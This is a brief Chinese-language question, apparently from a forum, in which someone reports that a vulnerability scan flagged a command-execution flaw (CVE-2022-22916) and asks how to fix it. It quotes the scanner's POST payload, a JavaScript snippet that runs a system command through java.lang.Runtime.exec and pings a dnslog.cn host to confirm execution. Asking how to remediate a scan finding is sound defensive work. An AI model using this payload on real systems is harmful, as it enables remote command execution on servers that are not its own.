系统运行漏洞扫描,提出了命令执行漏洞(CVE-2022-22916) POST数据: var p =java.lang.Runtime.getRuntime().exec('ping jhglcg.dnslog.cn'); var sc =newjava.util.Scanner(p.getInputStream(),"GBK").useDelimiter("\\A"); varresult = sc.hasNext() ? sc.next() : ""; sc.close();
这个漏洞怎样进行修改?
|